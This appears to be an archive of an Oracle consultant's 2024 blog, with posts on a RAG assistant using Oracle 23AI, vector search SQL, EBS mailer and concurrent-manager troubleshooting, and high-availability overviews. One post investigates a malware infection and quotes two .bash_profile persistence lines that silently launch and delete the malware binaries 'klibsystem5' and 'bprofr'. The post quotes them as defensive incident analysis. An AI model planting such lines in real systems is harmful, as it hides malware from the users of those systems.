Monday, December 16, 2024

Building a Retrieval-Augmented Generation (RAG) System with Oracle Database 23AI, OCI and LLM(s): Powering Up Information Retrieval with AI

Greetings, database enthusiasts! Today, we're diving into the exciting world of Retrieval-Augmented Generation (RAG) systems.  Here I 'am blogging again. This time with the motivation of Oracle Database 23 AI's vector capabilities, that we leveraged while building ourselves a Sales Assistant. While leveraging the power of Oracle 23AI, we also used OCI 's and Cohere's large language models (and integrations), and Flask for building our solution. This AI bases Sales Assistant is in beta version, but we can make it production ready by putting a little more effort, and making it reach perfection.

Basically, our sales assistant takes questions from the user and provides answers by using the LLM models in the backend. However; the answers generated by the LLM modes are always kept in the context, and this is done by the help of RAG (and some orchestration done via our python code.)

The value here is that, we used Oracle Database 23AI for our vector store. So we didn't position a separate database for storing vector embeddings and doing vector similarity searches.

You can extrapolate that and think of what you can do with these types of new features of Oracle Database 23AI.

Anyways.. What about RAG?

Imagine a system that can not only find relevant information but also craft insightful answers based on that knowledge. That's the essence of RAG. It takes information retrieval a step further by using generative models to create comprehensive responses to user queries.

Our Project: 

In this project, we created a custom RAG system that leverages three key players:

Oracle 23AI: Oracle's new version database acts as our knowledge repository, storing documents and their corresponding vector embeddings (think of them as condensed representations capturing the document's meaning).

Cohere: We'll tap into Cohere's arsenal of LLMs, like command-r-plus, for answer generation. These models are masters at weaving words into coherent and informative responses.

Flask: This lightweight web framework serves as the user interface, allowing users to interact with our system and receive answers to their questions.

The Deep Dive: How It Works

Query Embeddings: When a user asks a question, the system transforms it into an embedding using Cohere. This embedding becomes the key to unlocking relevant information.

Knowledge Retrieval: The system dives into the Oracle 23AI database, wielding the power of vector similarity search. It compares the query embedding with stored document embeddings to identify the most relevant documents – think of it as finding the closest matches in the knowledge vault.

Refining the Results: Not all retrieved documents are created equal. We utilize Cohere's reranking model to sort these documents by their true relevance to the user's query, ensuring the most pertinent ones are at the forefront.

Answer Generation: Now comes the magic! Cohere's LLM takes center stage. It analyzes the query and the top-ranked documents, crafting a comprehensive answer that incorporates both the user's intent and the relevant retrieved information. 

Serving Up the Answer: Finally, the user receives the answer, along with the most relevant documents to provide context and transparency.

Why Oracle 23AI?

Here's why Oracle 23AI is the perfect partner for our RAG system:

Vector Powerhouse: Its vector datatype enables efficient storage, indexing, and retrieval of document embeddings, crucial for speedy searches.

Scalability: As our system grows, Oracle 23AI can handle the increasing volume of data with ease.

A Word on Overcoming Challenges

During our project, we encountered a minor problem: the Frankfurt region on Oracle Cloud Infrastructure (OCI) didn't support the specific Cohere model we needed. --Note that, for some part of the work, we reached LLM models through OCI (via its services -- integration), and for some other part of it (like the text generation), we reached LLM models directly from our code..-- So, we switched to the Chicago region, which provided seamless integration. Just a reminder, sometimes a quick regional shift can save the day!

The Future of RAG: A World of Possibilities

RAG systems hold immense potential to revolutionize information retrieval. By combining retrieval-based approaches with generative models, we can create systems that understand user intent, provide comprehensive answers, and constantly learn and improve.

Ready to Build Your Own RAG System?

This blog post serves as a springboard for your RAG exploration. With the power of Oracle 23AI, Cohere, and Flask, you can create a system that empowers users to unlock the true potential of information. Stay tuned for future posts where we delve deeper into the code and implementation details!

As always, feel free to leave any questions or comments below. 

Wednesday, December 4, 2024

Exploring the limitations of classical computing and the types of business problems Quantum is best suited for.

By studying the Quantum Business Foundations, I revisited (and updated) the relevant part of my knowledge base, which was about the limitations of classical computing and the types of business problems quantum is best suited for (including the answer for the question why). 

This was for identifying the implications of the paradigm shift brought about by quantum to the business strategy, technology and operating model.

Friday, November 29, 2024

Diving practically into Quantum-Safe Cryptography

Let's protect our confidential information, our secrets with mechanisms and algorithms that are computationally difficult to break. Think ahead and make your crypto system be ready for the future. Post Quantum Cryptography it is . Be quantum-proof, quantum-safe, quantum-resistant..

Enough for the passioned intro :) I received my second certificate in IBM quantum and I am sharing it here. More to come :)

This was for being able to understand the foundations of cryptography, how the cybersecurity risk landscape is evolving in the quantum era, and how to protect against such threats through the use of new encryption algorithms.

Tuesday, June 11, 2024

EBS 12.2 -- Wf Mailer ( Mail Status SENT but No Email Delivered + Email From Section cannot be set to desired email address)


EBS Workflow Mailer  A Tale of Two Mysteries 

Alright folks, buckle up for some classic EBS weirdness! This one involves the Workflow Notification Mailer in a fresh Oracle EBS 12.2.11 project. We got it all configured, tested it – IMAP, SMTP, everything seemed okay. But then, like a magic trick gone wrong, emails stopped flowing. 

The customer's mail admin checked the server logs, but saw nothing. Their words? "Your mailer taps the SMTP server on the shoulder, then just walks away. No emails, no nothin'." We chased network packets, analyzed traces – same story. The mailer wasn't even attempting to send anything. No errors,  just a complete disregard for its duties.

Telnet tests? Perfect. Workflow mail status? "SENT".  We disabled everything : disabling TLS/SSL, using relays – nothing worked. Finally, in a moment of desperation, we cleared the functional admin cache and restarted the mailer. And bam! Emails started flowing again.

We suspect a wrong configuration stuck there, during all our testing. Maybe a change, not even directly related to the mailer, messed with some underlying setting it relies on (a sneaky delivery preference, perhaps?). Whatever it was, clearing the cache did the trick.

But wait, there's more! The emails sent by the mailer had some strange "From" address, in the format of "<Workflow SMTP account/username>". We tried everything on the mailer side to change it, but nothing helped. Turns out, the mail server itself was missing a crucial piece – the setting of the display name. Without it, the server's default config (for the from field) was overriding (it seems so) the workflow mailer's settings.

So, the customer added a display name – "WF Mailer PROD EBS 12.2" (exactly what we wanted!) – on the mail server. And mystery number two solved.

Moral of the story? EBS can be a box of chocolates. You never know what you're gonna get. But hey, at least we got the mail flowing and the "From" address looking as we wanted. Now, if you'll excuse me, I need a strong cup of coffee to recover from that rollercoaster ride :)

Tuesday, June 4, 2024

Converged Database - Oracle Database 23AI Vector Search - Combine traditional search on business data with AI vector powered similarity search.

 

Oracle Database 23AI Vector Search: A Game Changer for Enterprise Search

Hey everyone, Erman Arslan here. Today, I'm diving into a revolutionary new feature in Oracle Database 23AI: Vector Search. This technology promises to completely transform how you search for information, especially within your enterprise data.

Understanding Semantics Through Vectors

Imagine searching for data based on meaning, not just keywords. That's the power of Vector Search. It uses machine learning embedding models, like ResNet for images and Bert for text, to convert your data into vectors. These vectors represent the semantic essence of your information. Similar entities will have vectors close together in this multidimensional space.

The Power of Combining Traditional and AI-powered Search

The beauty of Oracle Database 23AI is that it seamlessly integrates traditional search with AI-powered vector similarity search. This eliminates the need for placing separate Vector Databases. which can lead to data staleness, increased complexity, hard-to-maintain consistency, and security risks.

23AI: The Enterprise-grade Advantage

Here's where Oracle shines. Oracle Database 23AI, is a converged platform that eliminates the complexities of managing separate systems. It also tackles a major challenge of Large Language Models (LLMs): hallucination. By combining LLM knowledge with relevant search results from vector searches, 23AI ensures accurate and reliable responses.

LLM + AI Vector Search: A Powerful Knowledge Base

Imagine this: you have a vast knowledge base that combines real-time enterprise data with a broad range of information from the internet. That's the magic of LLM and AI Vector Search working together. Users submit queries, which are encoded as vectors and searched against the database. The closest matches are then fed to the LLM, empowering it to deliver comprehensive and informative responses.

"LLM + AI Vector Search" means broad Range of data from internet snapshot of data from a point in time + Private Enterprise Business Data !!! (Real Time updating the knowledge base...)

Unveiling the New SQL for Vector Power

23AI introduces a range of new SQL features to unleash the power of vector searches:

  • New SQL for Vector Generation: Easily generate vectors from your data.
  • New Vector Data Type: Store vector embeddings efficiently using the new VECTOR data type.
  • New Vector Search Syntax: Perform efficient similarity searches with the VECTOR_DISTANCE function and optional distance metrics.
  • New Approximate Search Indexes: Achieve high performance with approximate search indexes for large datasets.
  • New PL/SQL Packages and Integrations: Extend the functionality with PL/SQL packages and integrate with third-party frameworks for building robust AI pipelines.

Crafting Powerful Vector Search Queries

Here's an example query that demonstrates the power of vector search:

SQL

SELECT ... FROM JOB_Postings WHERE city IN (SELECT PREFERRED_ CITIES FROM Applications...) ORDER BY vector_distance(job_desc_vectors, :resume_vector) FETCH APPROXIMATE FIRST 10 ROWS ONLY WITH TARGET ACCURACY 90;

This query searches for job postings with job descriptions most similar to the provided resume vector, ensuring a perfect match for the candidate.

Choosing the Right Vector Index

23AI offers two types of vector indexes for optimal performance:

  • Graph Vector Index: In-memory index for fast and highly accurate searches on smaller datasets.
  • Neighbor Partition Vector Index: Scalable index for massive datasets that can't fit in memory. It delivers fast results with a high chance of finding relevant matches.
Here is an index creation Example/Syntax;

DDL

CREATE VECTOR INDEX photo_idx ON Customer(photo_vector) 
ORGANIZATION [INMEMORY_ NEIGHBOR GRAPH | NEIGHBOR PARTITIONS]
DISTANCE COSINE | EUCLIDEAN | MANHATTAN | ... WITH TARGET ACCURACY 90 (Here we can specify the accuracy.. )

Note that, we use APPROXIMATE keyword to tell the  optimizer use the relevant index But even if we specify that, Oracle's Cost Based optimizer can still do exact searches, if it finds the index access costly. Ex: FETCH APPROXIMATE FIRST 5 ROWS ONLY.

The Importance of Enterprise-grade CBO

Optimizing vector search queries, especially when combined with normalized enterprise data, requires an enterprise-grade Cost-Based Optimizer (CBO). 23AI delivers on this front, unlike purpose-built vector databases that lack this crucial functionality.

Beyond Single Vectors: Multi-Vector Queries

23AI empowers you to perform multi-vector queries, allowing you to search based on a combination of different vectors.

Key Differentiators: Why Choose Oracle Database 23AI

  • Transactional Consistency: Neighbor Partition Vector Indexes guarantee transactional consistency, making them ideal for high-speed, consistent operations.
  • Scale-out Architecture: Distribute vector search workloads across RAC nodes for exceptional scalability.
  • Exadata Offloading: Offload vector search tasks to Exadata Storage for even greater performance.
  • Seamless Integration: Oracle Sharding, parallel execution, partitioning, security, etc.. All work seamlessly with AI Vector Search.

AI Vector Search: The Engine of GEN AI Pipelines

23AI goes beyond search. It serves as the foundation for powerful GEN AI Pipelines. These pipelines seamlessly integrate document loading, transformation, embedding models, vector search, and LLM reasoning – all within the robust Oracle Database 23AI platform.

This is just a glimpse into the exciting world of Oracle Database 23AI Vector Search. Stay tuned for future posts where we'll delve deeper into specific use cases and explore the key features (like True Cache and Distributed-Database related enhancements...) of the new Oracle Database Release.

Friday, May 31, 2024

Erman Arslan's Oracle Forum / APR 23 - MAY 31, 2024 - "Q & A Series"

Empower yourself with knowledge! Erman Arslan's Oracle Blog offers a vibrant forum where you can tap into a wealth of experience. Get expert guidance and connect with a supportive community. Click the banner proclaiming "Erman Arslan's Oracle Forum is available now!" Dive into the conversation and ask your burning questions.

-- or just use the direct link: http://erman-arslan-s-oracle-forum.124.s1.nabble.com A testament to its vibrancy: over 2,000 questions have been posed, sparking nearly 10,000 insightful comments. Explore the latest discussions and see what valuable knowledge awaits!



Supporting the Oracle users around the world. Let's check what we have in the last few weeks..

Tuesday, May 14, 2024

Linux -- Decoding the High CPU Usage Mystery: A Bash Shell Odyssey / Autogenerating bash process - Malware - klibsystem5 & bprofr

 

Decoding the High CPU Usage Mystery: A Bash Shell Odyssey


This blog post details the investigation of a high CPU usage issue caused by a rogue bash process on an Oracle Linux server. This systematic investigation identified malicious scripts causing the high CPU usage. This blog post also offers valuable insights into troubleshooting bash process issues and highlights the importance of secure system configurations. 

Note that, this is based on a real story. (an issue reported to me through my forum: Erman Arslan's Oracle Forum)

The Case:

Customer, encountered a bash process consuming 98% CPU. Killing it only brought temporary relief as it automatically restarts.

The Investigation Begins:

I requested more information to understand the process's behavior. Customer provided the top command output, revealed the bash process with a high CPU usage.

Digging Deeper:

I suggested using ps with the -elf flag to get detailed process information. This revealed the bash process is in the sleeping state (s). Analyzing the /proc/8879/cmdline file confirmed it was a bash shell, but the process seemed inactive. Note that 8879 was the PID of the process.

Next, I requested the output of w to see logged-in users and processes. This helped rule out user interaction as the cause.

Process Examination:

I instructed customer to examine the contents of the bash process's working directory (/proc/8879/cwd) and open file descriptors (cd /proc/8879/fd/; ls -la). This revealed the process had file descriptors related to appsdev, a development OS user, and seemed to be waiting for an event (eventpoll).

Background info:

Unknown process with -bash not showing it: This process might be a child process spawned by the bash shell itself, or another system service running in the background.

4 -> anon_inode:[eventpoll]: This indicates the process is using an event poll mechanism to monitor events from various sources.
9 -> anon_inode:[eventfd]: This suggests the process might be using an eventfd for efficient inter-process communication or signaling.

It is probably a OS process.. Probably, OS or a daemon starts it.. It may belong to a monitoring process such as systemd-monitor.

*Use ps aux or pstree to get a detailed listing of running processes. Look for processes with a parent process ID (PPID) matching the bash shell (bash).

Stracing the System Call:

I analyzed the output of strace on the process. This confirmed the bash process was stuck in the epoll_pwait system call, waiting for events from an epoll instance. The repeated calls with timeouts suggested it wasn't receiving expected events. Here's how to interpret the output and troubleshoot further:

epoll_pwait: This system call waits for events on an epoll instance. It's a mechanism for efficient I/O waiting in applications.

The arguments to epoll_pwait specify the epoll instance, timeout values, and number of events to wait for.

Analysis of strace Output:

The process repeatedly calls epoll_pwait with a timeout (values like 182, 220, etc.).

Between calls, it uses clock_gettime to get the current time. This suggests the process isn't receiving expected events and keeps waiting with timeouts.

Suggested more investigation:

  • Check cron jobs and systemd services for any entries that might be starting the bash process.
  • Review system logs (/var/log/messages and dmesg) for any errors related to the process.
  • Investigate Script Purpose.. If the script is legitimate, investigate its purpose and modify it to avoid excessive I/O calls and resource usage.
  • Debug Bash Processes (Cautionary Approach): I warned about the risks of enabling debug for all bash processes. This was a complex approach and should have been only be attempted with a thorough understanding of the potential consequences.
  • Suggested commands for getting information on the context : 
    • pstree
    • cat /proc/<pid>/cmdline
    • cat /proc/<pid>/cwd
    • cd /proc/<pid>/fd; ls -al
    • ls -l /proc/<pid>/cwd
    • strace -p <pid>
    • lsof -p <pid>
    • crontab -l
    • systemd services with systemctl list-unit-files and systemctl status <service_name>.
    • cat .bash_profile (customer discovered this one.. by the help of the suggestions)

The Culprit Revealed:

With the provided guidance, customer discovered a suspicious entry in his .bash_profile that was designed to automatically copy and execute a script (/tmp/-bash). This script appeared to be scanning for open ports (80, 443, etc.). This explained the eventpoll descriptor and the process waiting for I/O.

--
I can see, there is an entry made in .bash_profile by automatically. please see below:
cp -f -r -- /bin/klibsystem5 2>/dev/null && /bin/klibsystem5 >/dev/null 2>&1 && rm -rf -- /bin/klibsystem5 2>/dev/null
cp -f -r -- /tmp/.pwn/bprofr /tmp/-bash 2>/dev/null && /tmp/-bash -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- /tmp/-bash 2>/dev/null

--

*The system was affected by klibsystem4 and bprofr.. These were malwares..

Suggestions for the fix:

  • Manual removal of the malware(s) - klibsystem5 & bprofr , by discovering their source files and the affected system files and deleting(purifying in the case of the system files) all of them one by one.
  • Migrating the affected applications / databases to a new server.. This might be a better option in the case we can't be sure about the removal of whole of the malware(s). But if we migrate, there is a risk that we migrate the malware too. So a careful and delicate work is required..

Monday, April 29, 2024

Demystifying the Oracle EBS R12.2- Prepare Phase: Code Objects and Stub Objects

This blog post tackles common questions regarding code objects and the prepare phase in Oracle EBS R12.2. Note that, this is derived from my forum.. Based on a real question. It's especially helpful for those new to EBS 12.2 and want to understand how code objects are handled during patching.

The Questions:

  1. Are all code objects copied from the run edition to the patch edition during the prepare phase?
  2. If not copied, how do they exist after the cutover?
  3. Are the objects copied during the prepare phase called stub objects?

Understanding Editioning and EBR:

We clarify that code objects are editionable. This means they are managed through Oracle's Edition Based Redefinition (EBR) feature, rather than simply being copied. EBR allows for maintaining different versions of code objects within the same database.

Code Objects in the Patch Edition:

During the prepare phase, code objects aren't physically copied. Instead, they are editioned in the patch edition. This essentially creates new versions of the code objects specific to the patch.

Cutover and Using New Code Objects:

The cutover phase activates the patch edition. As a result, the newly editioned code objects become active, and you automatically start using them.

Stub Objects Explained:

These aren't actual code objects but rather placeholders. They act as pointers referencing the original code objects in the run edition.

Why Stub Objects?

Stub objects are lightweight, minimizing the initial size of the patch edition. This efficiency is crucial for online patching, where downtime is minimized.

A Clearer Picture:

Imagine the run edition as your main codebase. The prepare phase creates a new edition (patch edition) with pointers (stub objects) to the run edition's code objects. These pointers are lightweight, keeping the patch edition initially small. Finally, during cutover, the patch edition becomes active, and you start using the editioned code objects.

Friday, April 26, 2024

Oracle Database / Datawarehouse Security, High Availability & Disaster Recovery

Following is a quick article that I prepared for providing the data security, high availability and disaster recovery solution all at once for a mission critical Oracle Data warehouse environment. Below, you will find Oracle Advanced Security, Oracle RAC , Golden Gate, Dataguard and other related features and solutions of Oracle all at once, integrated together, put into the context and proposed together to be in place for securing the data, making it high available and protecting both the data and the services from disasters. Features / Solutions given here can be used in different contexts (for instance: Golden Gate can be used for data integration) as well, but here we are in the scope of data security, high availability and DR, so I will not get into that.

Oracle Database / Data Warehouse - Advanced Security Option for Data Security:

Securing Your Oracle Data Warehouse: Why Oracle Advanced Security is the Right Choice

Introduction

Data warehouses hold an organization's most valuable asset: its data. This data can include sensitive customer information, financial records, and intellectual property. Ensuring the security of this data is paramount. Oracle Advanced Security (OAS) is the ideal solution for robust data security within your Oracle data warehouse, and it can be tailored to your data warehouse environment, providing the peace of mind that comes with knowing your data is safe.

Robust Data Security Measures

OAS offers a comprehensive suite of functionalities to address all aspects of data security:

  • Encryption: Transparent Data Encryption (TDE) encrypts data at rest within the database, rendering it unreadable even if an attacker gains access to storage media.
  • Access Controls: OAS enforces granular access controls, allowing you to define precisely who can access specific data and what actions they can perform.
  • Authentication: OAS supports various strong authentication mechanisms like Kerberos and PKI, ensuring only authorized users can access the data warehouse.

Benefits of Oracle Advanced Security

  • Seamless Integration: OAS integrates seamlessly with your existing Oracle database environment. There's no need to modify applications, minimizing disruption and implementation costs.
  • Performance Efficiency: OAS is designed for minimal performance impact. Data encryption and decryption happen transparently, ensuring smooth operation of your data warehouse.
  • Regulatory Compliance: OAS helps meet compliance requirements for data privacy regulations like PCI DSS and HIPAA.
  • Data Security Lifecycle Coverage: OAS protects data throughout its lifecycle, from encryption at rest to securing backups and exports.

Addressing Specific Data Warehouse Security Concerns

Data warehouses often house highly sensitive data. OAS addresses these concerns:

  • Insider Threats: OAS enforces access controls, preventing unauthorized access attempts, even from privileged users.
  • Data Breaches: TDE renders data useless even if stolen, minimizing the impact of a breach.
  • Accidental Data Exposure: Data redaction, another feature of OAS, allows you to mask sensitive data retrieved by queries, further protecting sensitive information.

In addition to the Oracle Advanced Security Components, Audit Vault, Database Firewall and Database Vault can be implemented to provide the Maximum Security Architecture for ensuring the security of the data end-to-end, in transit and in place.

Here is the short take / Conclusion:

Oracle Advanced Security provides a robust and efficient solution for securing your Oracle data warehouse. It offers comprehensive data encryption, access controls, and authentication mechanisms, all seamlessly integrated with your existing environment. By choosing OAS, you ensure a high level of data security for your most valuable asset. Implementing the Maximum Security Architecture (MSA) of Oracle takes data security to the ultimate, maximum level. By implementing the MSA, your gains in the context of data security will be Auditability, Regulatory Compliance, Operational Efficiency, Risk Minimization, Correct Authorized Access, Role Based Authorization, Minimum Req. Privilege Principle, Separation of Duties, Data Security, Strengthened Authentication, Risk-based Authorization Control, Compliance with Security Standards, Centralized Reporting, Centralized Key Management, Centralized Security Management and Anomaly detection in Data Access.

Data Warehouse Continuity- Oracle Database – High Availability Features:

Ensuring Uninterrupted Data Access: Oracle Database High Availability for Your Data Warehouse

Introduction

In today's data-driven world, uninterrupted access to your data warehouse is critical for informed decision-making. Downtime can lead to missed opportunities, lost productivity, and erode user confidence. This paper explores how Oracle Database's High Availability (HA) features, specifically Oracle Real Application Clusters (RAC), ensure continuous operation of your Oracle data warehouse.

Our Expertise in High Availability Solutions ( just a little advertisement:)

My team and I possesses extensive experience in implementing and managing high availability solutions for Oracle databases. We understand the critical role of data warehouse uptime and leverage the power of Oracle HA to create a robust and resilient environment. We can implement Oracle Database in a highly available manner by using the Oracle Features in this context. Oracle Database Features combined with our implementation experience, can ensure your data warehouse remains accessible 24/7, empowering informed decisions and driving business success.

What is Oracle Database High Availability?

Oracle offers a comprehensive set of features for achieving high availability in your data warehouse. RAC, the cornerstone of this approach, allows you to run your database on multiple servers (nodes) concurrently in active-active manner.

 This provides several key benefits:

  • Failover: If a node fails, the remaining nodes automatically take over processing, minimizing downtime and ensuring data remains accessible.
  • Scalability: RAC facilitates horizontal scaling by adding additional nodes, enabling your data warehouse to handle increased data volumes and user demands.
  • Planned Maintenance: You can perform maintenance on individual nodes without impacting overall data warehouse availability.

Addressing Data Warehouse Continuity Concerns

Data warehouses often face unique challenges regarding continuity:

  • Large Data Volumes: RAC's parallel processing capabilities ensure efficient data loading and retrieval, even with massive datasets.
  • Batch Processing Windows: Planned maintenance can be scheduled outside of critical batch processing windows, minimizing disruption.
  • Disaster Recovery: RAC integrates with Oracle Data Guard for disaster recovery, providing a geographically separate replica for business continuity in case of a major outage.

Beyond RAC: Additional High Availability Features

Oracle's HA suite extends beyond RAC, offering additional functionalities:

  • Oracle Data Guard: Creates synchronized standby databases for disaster recovery and read-only workloads.
  • Automatic Storage Management (ASM): Simplifies storage management and facilitates automated failover in case of disk failures.
  • Oracle Restart: Monitors and automatically restarts critical Oracle components in case of failures.

Here is the short take / Summary:

By leveraging Oracle Database High Availability features, we can create a highly available data warehouse environment. Our expertise ensures a seamless implementation, maximizing uptime and minimizing the impact of potential outages. We, certified Oracle experts with extensive experience in implementing and customizing Oracle Database for various industries and business requirements.

Oracle Data Warehouse - Disaster Recovery Implementation

Disaster Recovery for Your Oracle Data Warehouse: Minimizing Downtime, Maximizing Peace of Mind

Introduction

Natural disasters, technical failures, or cyberattacks can cripple your business by disrupting access to your data warehouse. Here I will briefly summarize how Oracle Database's disaster recovery (DR) features equip you to recover your data warehouse swiftly in the face of such events, minimizing downtime and ensuring business continuity. I will try to give a quick explanation of how Oracle's DR features, combined with our (my team and I) proven expertise, can minimize downtime and ensure your data warehouse remains operational even in the face of disaster.

Our Proven Track Record in Disaster Recovery

My team and I posses a proven track record of implementing and managing robust DR solutions for Oracle data warehouses. We understand the criticality of rapid recovery and leverage Oracle's DR features to create a comprehensive disaster preparedness plan.

Oracle Database Disaster Recovery: Built-in Resilience

Oracle offers a comprehensive suite of DR functionalities designed to get your data warehouse back online quickly:

  • Data Guard: This core technology creates a synchronized copy (standby database) of your production data warehouse at a geographically separate location. This ensures data availability even if the primary site becomes unavailable.
  • Active Data Guard: This advanced option allows read-only access to the standby database, offloading some workload from the primary and enabling faster failover in case of disaster.
  • Golden Gate: For complex data warehouse environments, Golden Gate facilitates heterogeneous replication, allowing replication between dissimilar database systems if needed for your DR strategy.
  • Recovery Manager (RMAN): This powerful tool simplifies backups, enabling efficient restoration of your data warehouse to a specific point in time.

Addressing Data Warehouse DR Challenges

Data warehouses present unique considerations for disaster recovery:

  • Large Datasets: Oracle Data Guard's efficient replication methods minimize bandwidth consumption and ensure timely synchronization of massive data volumes.
  • Data Consistency: Our expertise ensures configuration of Data Guard for optimal consistency based on your specific recovery time objective (RTO) and recovery point objective (RPO) requirements.
  • Testing and Failover: Regular DR testing done in this context ensures seamless failover to the standby site and rapid data warehouse recovery.

Beyond Recovery: Building a Comprehensive DR Plan

Disaster recovery goes beyond technology. Oracle Consultancy services (Such as my team and I provide) encompass:

  • DR Strategy Development: We collaborate with you to define your RTO, RPO, and DR site selection based on your business needs.
  • DR Plan Documentation: We create a comprehensive DR plan outlining roles, responsibilities, and failover procedures for a smooth recovery process.
  • Ongoing Support: We offer ongoing support to ensure your DR plan remains current and your team is prepared for any eventuality.

Her is the Short Take / Conclusion

By leveraging Oracle Database's disaster recovery features and our extensive experience, we can create a robust DR plan for your data warehouse. This ensures minimal downtime, rapid recovery, and protects your business from the impact of unforeseen disasters.

Wednesday, April 24, 2024

EBS 12.2 -- oracle.apps.fnd.cp.gsm.GSMSvcComponentContainer starts from wrong filesystem / patch filesystem

Question: How much time do you spend/lose?
Answer: Well, how much time I gain? :)

I mentioned in my previous blog post that I will share some of the interesting cases here. Erman Arslan's Oracle Blog / Forum has 350 subscribers asking questions regularly and here I 'm sharing the interesting ones.

You asked:

We have an Oracle 12.2.6 EBS system.

Run FS is fs1

As soon as system started, all the services are running on fs1 , except oracle.apps.fnd.cp.gsm.GSMSvcComponentContainer

GSM starts on fs2. Concurrent Managers are using binaries from fs2.

If we run an empty ADOP patching cycle, after cutover then all is OK -> they all starts from fs2.

But if we run it one more time, all the services start from fs1 as expected but those mentioned ones start from fs2!

Running adconfig is not helping and we even checked that in context file of fs1 none of the parameters reference to fs2.

None of the env parameters pointing to fs2.

Where it takes that fs2 value?

What is this ? Any ideas ?

Moreover;

if I do env |grep fs2 -> the patch_base is fs2.

So meaning conc starting from patch base..

Any hints would be appreciated :)

ps -ef |grep fs2

/testapp/oracle/TEST/fs2/EBSapps/comn/util/jdk64/bin/java -DCLIENT_PROCESSID=24445080 -Dhttp.proxyHost= -Dhttp.proxyPort= -Dhttp.nonProxyHosts= -Djava.awt.headless=true -Xmx384m -Doracle.apps.fnd.common.Pool.leak.mode=stderr:off -verbose:gc -Ddbcfile=/testapp/oracle/TEST/fs2/inst/apps/TEST_ebstestapps/appl/fnd/12.0.0/secure/TEST.dbc -Dcpid=9758 -Dconc_queue_id=1140 -Dqueue_appl_id=0 -Dlogfile=/testout/oracle/TEST/conc/log/FNDCPGSC9758.txt -DLONG_RUNNING_JVM=true -DEBS_HOSTNAME=ebstestapps -DOVERRIDE_DBC=true -DFND_JDBC_BUFFER_MIN=1 -DFND_JDBC_BUFFER_MAX=2 oracle.apps.fnd.cp.gsm.GSMSvcComponentContainer

So where is in EBS the reference to use this /testapp/oracle/TEST/fs2/EBSapps/comn/util/jdk64/bin/java? and not the java from fs1?


/testapp/oracle/test/fs2/EBSapps/comn/util/jdk64/jre/bin]> ./java -version
java version "1.7.0"

Java(TM) SE Runtime Environment (build pap6470sr9fp10-20150708_01(SR9 FP10))

IBM J9 VM (build 2.6, JRE 1.7.0 AIX ppc64-64 Compressed References 20150701_255667 (JIT enabled, AOT enabled)

J9VM - R26_Java726_SR9_20150701_0050_B255667

JIT - tr.r11_20150626_95120.01

GC - R26_Java726_SR9_20150701_0050_B255667_CMPRSS

J9CL - 20150701_255667)

JCL - 20150628_01 based on Oracle jdk7u85-b15

/testapp/oracle/test/fs2/EBSapps/comn/util/jdk64/jre/bin]> cd /testapp/oracle/test/fs1/EBSapps/comn/util/jdk64/jre/bin

/testapp/oracle/test/fs1/EBSapps/comn/util/jdk64/jre/bin]> ./java -version

java version "1.7.0"

Java(TM) SE Runtime Environment (build pap6470sr9fp10-20150708_01(SR9 FP10))

IBM J9 VM (build 2.6, JRE 1.7.0 AIX ppc64-64 Compressed References 20150701_255667 (JIT enabled, AOT enabled)

J9VM - R26_Java726_SR9_20150701_0050_B255667

JIT - tr.r11_20150626_95120.01

GC - R26_Java726_SR9_20150701_0050_B255667_CMPRSS

J9CL - 20150701_255667)

JCL - 20150628_01 based on Oracle jdk7u85-b15

And now I know why :

autoconfig does not populate fnd_env_context table so majority of parameters there refer to fs2 .

So thats why have this problem.

Tried to update context file version to a higher version. The same issue..

So, I guess to fix our issue we need to clean fnd_env_context somehow?

How we can recreate autoconfig files and re-load fnd_env_context ?

Any hints ? :)

Thanks!

We said:

INFO :FND_ENV_CONTEXT Table stores information about environment name and value for each of the concurrent processes.

Action plan:

1)Run the "Purge Concurrent Requests and/or Manager Data" concurrent program with the necessary -parameters to clear that records from fnd_env_context.
2)Stop the concurrent processing
3) Run the Concurrent Manager Recovery Troubleshooting Wizard with the internal manager down as detailed in the following document:
Concurrent Processing - Concurrent Manager Recovery Troubleshooting Wizard (Note 134007.1)
4) Start the concurrent processing.

Reference:
MAIN REF: Workflow Mailer Won't Start In Cloned Environment (Doc ID 1953629.1) -- this for 12.1 but, it seems it is applicable for 12.2 as well.
Concurrent Processing - Purge Concurrent Request and/or Manager Data Program (FNDCPPUR) (Doc ID 104282.1)

Be careful while running this program. Don't break any business rules (i.e if there is a need to save the concurrent request log and out files for 30 days, then you will need to get the approval of business side for this...)

You can backup the following tables before running the conc program:

FND_CONCURRENT_REQUESTS
This table contains a complete history of all
concurrent requests. This table should ideally be kept at around
4 - 5k records and should be regularly purged as part of normal
'housekeeping' by running the standard FNDCPPUR program.
This is a part of basic system administration and it is recommended
that for the average instance, it should be run every 30 days or so.
Allowing the table ( and others ) to increase in size can affect performance.

FND_RUN_REQUESTS
When a user submits a report set, this table stores
information about the reports in the report set and
the parameter values for each report.

FND_CONC_REQUEST_ARGUMENTS
This table records arguments passed by the concurrent
manager to each program it starts running.

FND_DUAL
This table records when requests do not update
database tables.

FND_CONCURRENT_PROCESSES
This table records information about Oracle
Applications and operating system processes.

FND_CONC_STAT_LIST
This table collects runtime performance statistics
for concurrent requests.

FND_CONC_STAT_SUMMARY
This table contains the concurrent program
performance statistics generated by the Purge.

FND_ENV_CONTEXT
Table stores information about environment name and value for each of the concurrent process

You said:

Last time I managed to fix- so conc mgrs started on correct file system - by updating the s_contextserial to higher than in the database and re-run autoconfig.
select serial_number from FND_OAM_CONTEXT_FILES where status in ('S','F') and name not in
('METADATA','TEMPLATE') and ctx_type='A';

This time I am again having this issue after cutover.
This time updating the context_serial to higher than in db, is not helping.
autoconfig completes without any errors..
But the serial_number 65 but in context file I set it to 70.
Its not changing after autoconfig.
Any hints ? I think of cleanuping the fnd_oam_context_files ?

We said:

I think there are some things that affect some environment variables, left there, in the FND.. tables.. So, a wrong value in FND tables.
Yes.. FND_ENV_CONTEXT may be the cause.

After taking your backup, you can try truncating FND_OAM_CONTEXT_FILES and running autoconfig (first in db then in apps tier)afterwards.. But, what I recommend you is following;

INFO :FND_ENV_CONTEXT Table stores information about environment name and value for each of the concurrent process

Action plan:
1) Run the "Purge Concurrent Requests and/or Manager Data" concurrent program with the necessary -parameters to clear that records from fnd_env_context.
2) Stop the concurrent processing
3) Run the Concurrent Manager Recovery Troubleshooting Wizard with the internal manager down as detailed in the following document:
Concurrent Processing - Concurrent Manager Recovery Troubleshooting Wizard (Note 134007.1)
4) Start the concurrent processing.

Reference:
